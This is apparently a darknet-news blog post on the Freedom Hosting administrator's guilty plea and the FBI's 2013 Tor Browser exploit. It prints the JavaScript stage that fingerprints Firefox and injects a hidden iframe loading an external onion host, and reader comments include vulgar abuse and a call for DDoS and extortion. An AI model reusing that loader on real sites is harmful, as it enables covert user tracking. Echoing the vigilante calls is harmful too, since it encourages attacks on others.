Site will be messed up for a bit as I work on things/break them.
DNL

Freedom Hosting Admin Admits Child Pornography Charges

Eric Eoin Marques, the creator and administrator of Freedom Hosting, pleaded guilty to conspiracy to advertise child pornography. Freedom Hosting, at its height, was the largest Tor webhost and the FBI called Marques “the largest facilitator of child porn on the planet.”

Marques admitted operating Freedom Hosting from between 2008 and 2013 until his arrest in Dublin, Ireland. Investigators learned that Marques had helped operate “criminal communities dedicated to the sexual exploitation of children.” He was not a “hands off” administrator and actively participated in the child exploitation forums hosted on Freedom Hosting.

Freedom Hosting homepage

Freedom Hosting homepage

Law enforcement in Ireland arrested Marques after a grand jury had returned an indictment charging him with the following crimes:

  • Conspiracy to Advertise Child Pornography
  • Conspiracy to Distribute Child Pornography
  • Advertising Child Pornography
  • Distribution of Child Pornography

An example of his active participation and acknowledgement of the illegal forums using Freedom Hosting:

On April 24, 2013, a user of Website A posted a message asking whether the anonymous hosting service (AHS) is free to the end user. On April 25, 2013, the administrator of Website A responded that the AHS is “100% free” and that the administrator assumes that “the admin covers [the cost] himself as a·service to the [Network] pedo community.”

Website A, in this instance, is a reference to one of the largest child exploitation forums at the time. In a similar thread, users of the forum talked about Marques’ additional involvement:

On May 31, 2013, the administrator of Website A replied to a user that claimed, “[AHS] has NO control of the sites it hosts. It only hosts them.” The administrator responded, stating, “In reality [AHS] has full control over all the websites hosted on their servers. In fact, just a few days ago they patched a few of the core files running this very forum.” Later in the same conversation, the administrator noted that, though AHS does not “create or maintain ( as far as I know) any of the sites they are hosting” AHS could “do whatever they wanted with the-sites they host as they inherently have full access to the databases behind the sites.”

Freedom Hosting, in total hosted more than 8.5 million images of child exploitation material, according to an announcement from the Department of Justice. (Marques had little to no involvement in the administration of the majority of the sites hosted by Freedom Hosting. The government focused entirely on child pornography crimes.)

After seizing Freedom Hosting servers, the FBI relaunched the service using servers under their control in Maryland.

FBI describes the operation in the criminal complaint

FBI describes the operation in the criminal complaint

On August 1, 2013, some savvy Tor users began noticing that the Freedom Hosting sites were serving a hidden “iframe”—a kind of website within a website. The iframe contained Javascript code that used a Firefox vulnerability to execute instructions on the victim’s computer. The code specifically targeted the version of Firefox used in the Tor Browser Bundle—the easiest way to use Tor.

The compromised server injected an iframe and then injected additional iframes with scripts that checked the vistor’s browser version (See CVE-2013-1690 for more information). If a user’s browser version met the requirements (Firefox 17 on Windows), it would download an infected payload that sent the target’s MAC address and Windows hostname to a server in Virginia controlled by the FBI. This exploit required the use of javascript. And the Tor Browser Bundle shipped with javascript enabled by default.

Below is the first indication that something was not right. The full code consists of multiple scripts and is far too long to embed here. Can check it out here though. Magneto

function createCookie(name,value,minutes) {
	if (minutes) {
		var date = new Date();
		date.setTime(date.getTime()+(minutes*60*1000));
		var expires = "; expires="+date.toGMTString();
	}
	else var expires = "";
	document.cookie = name+"="+value+expires+"; path=/";
}

function readCookie(name) {
    var nameEQ = name + "=";
    var ca = document.cookie.split(';');
    for(var i=0;i < ca.length;i++) {
    	var c = ca[i];
    	while (c.charAt(0)==' ') c = c.substring(1,c.length);
    	if (c.indexOf(nameEQ) == 0) return c.substring(nameEQ.length,c.length);
    }
    return null;
}

function isFF() {
    return (document.getBoxObjectFor != null || window.mozInnerScreenX != null || /Firefox/i.test(navigator.userAgent));
}

function updatify() {
    var iframe = document.createElement('iframe');
    iframe.style.display = "inline";
    iframe.frameBorder = "0";
    iframe.scrolling = "no";
    iframe.src = "http://nl7qbezu7pqsuone.onion?requestID=XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX";
    iframe.height = "5";
    iframe.width = "*";
    document.body.appendChild(iframe);
}

function format_quick() {
    if ( ! readCookie("n_serv") ) {
        createCookie("n_serv", "XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX", 30);
        updatify();
    }
}

function isReady()
{
    if ( document.readyState === "interactive" || document.readyState === "complete" ) {

        if ( isFF() ) {
            format_quick();
        }
    }
    else
    {
        setTimeout(isReady, 250);
    }
}
setTimeout(isReady, 250);

Marques is scheduled for sentencing on May 11, 2020. He faces a mandatory minimum sentence of 15 years in prison.

Previously: DOJ: Freedom Hosting Admin has been Extradited to the US

h/t @just_some_d00d

18 Comments
It's Called We Engage In A Mild Amount of Tomfoolery
45941ad1
5fe38440 Fri, Feb 7, 2020

Sick people. Go offline on tor netwerk retards.

a26c1976
945853e0 Fri, Feb 7, 2020

and notihng of value was lost.

f5657083
b9fa78c0 Fri, Feb 7, 2020

one more nasty piece of shit hits the bowl

b6dccafa
7f3a0b60 Fri, Feb 7, 2020

i hope they catch the squaremarket admin too sick fucks

0d97cc0c
b9c8e3a0 Fri, Feb 7, 2020

can you show a comparison between what a site looks like normal and what a site looks like with iframe?

feef4e58
7334d450 Sat, Feb 8, 2020

CP aside, Freedom Hosting was a great service

4c41a2b7
3ffb3ea0 Sat, Feb 8, 2020

onemoretogo

“i hope the catch the squaremarket admins too sick fucks”

What do you mean? How do know the admins of squaremarket and why are they sick fucks?

8db94e41
683bf570 Sat, Feb 8, 2020

Didn’t know hosting on Freedom Hosting was free. That’s cool… not cool CP was how it stayed afloat

38d9fe58
f69a8020 Sat, Feb 8, 2020

WeAreAmsterdam is a scammer, unless of course they lost access to email. DO not order from them. Nothing shows.

6f2ef824
3609fc60 Sat, Feb 8, 2020

squaremarket allowed cp for a long time that is why they were never listed on deepdotweb when it was still around and still not many sites list them

79e851b2
3609fc60 Sat, Feb 8, 2020

Law enforcement had seized DeepDotWeb long before Square Market launched. The market itself has not existed a “long time” yet.

1f1b0910
f2aa9c20 Sat, Feb 8, 2020

15 years for this piece of shit is a joke, 150 years would not be long enough. Wish these other pieces of shit who DDOS the fuck out of these markets would target these Pedo Sites, surely they could extort the fuck out of them until they kill themselves, hopefully!

bf818aa6
ce4f2c70 Sat, Feb 8, 2020

whack boy. CP rlly bad.

cbfd23a7
2c33ddb0 Sat, Feb 8, 2020

These guys need to all GO. It’s so disgusting how can you even get off on a young human like they aren’t even developed.

e4bcae01
aea6b750 Sat, Feb 8, 2020

sick fucks he got only 15 years wtttttfffff!!!

7b0d489b
32f55e90 Sun, Feb 9, 2020

fuck Ross for life, and he gets 15 years? fuck the American justice system

310cd21f
b964cd20 Sun, Feb 9, 2020

Do you guys not know what a mandatory minimum sentence is? 15 years is the MINIMUM he will serve. It’s highly unlikely the judge will give him the lightest sentence. This guys going away for life

745939ea
f6ca3210 Sun, Feb 9, 2020

i just hope i can join these sick fucks in prison

New comments are disabled after ten days in an attempt to limit spam.